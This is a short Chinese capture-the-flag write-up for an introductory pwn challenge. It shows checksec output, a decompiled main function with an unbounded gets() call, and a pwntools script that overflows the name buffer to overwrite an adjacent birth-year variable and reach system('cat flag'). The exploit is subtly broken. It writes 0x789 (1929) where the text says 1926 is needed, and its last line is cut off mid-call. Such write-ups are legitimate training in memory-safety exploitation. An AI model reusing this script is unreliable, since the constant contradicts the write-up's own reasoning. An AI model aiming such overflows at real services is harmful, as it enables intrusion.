#之前这题的解题已经写完不小心被我删了。这里重新写上 = =!
checksec:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
IDA:
__int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 result; // rax char v4; // [rsp+0h] [rbp-20h] unsigned int v5; // [rsp+8h] [rbp-18h] unsigned __int64 v6; // [rsp+18h] [rbp-8h] v6 = __readfsqword(0x28u); setbuf(stdin, 0LL); setbuf(stdout, 0LL); setbuf(stderr, 0LL); puts("What's Your Birth?"); __isoc99_scanf("%d", &v5); while ( getchar() != 10 ) ; if ( v5 == 1926 ) { puts("You Cannot Born In 1926!"); result = 0LL; } else { puts("What's Your Name?"); gets(&v4); printf("You Are Born In %d ", v5); if ( v5 == 1926 ) { puts("You Shall Have Flag."); system("cat flag"); } else { puts("You Are Naive."); puts("You Speed One Second Here."); } result = 0LL; } return result; }
这题思路很简单,首先输入的出生年份不能能为1926,但是进入else函数后需要出生年份为1926就可以得到flag,这里在输入名字的时候溢出覆盖年份的值为1926就可以了
exp:
from pwn import * io = remote("ipaddr",port)
io.sendlineafter('Birth?','beef')
payload = b'a'*8 + p64(0x789)
io.sendlineafter('Name?',payload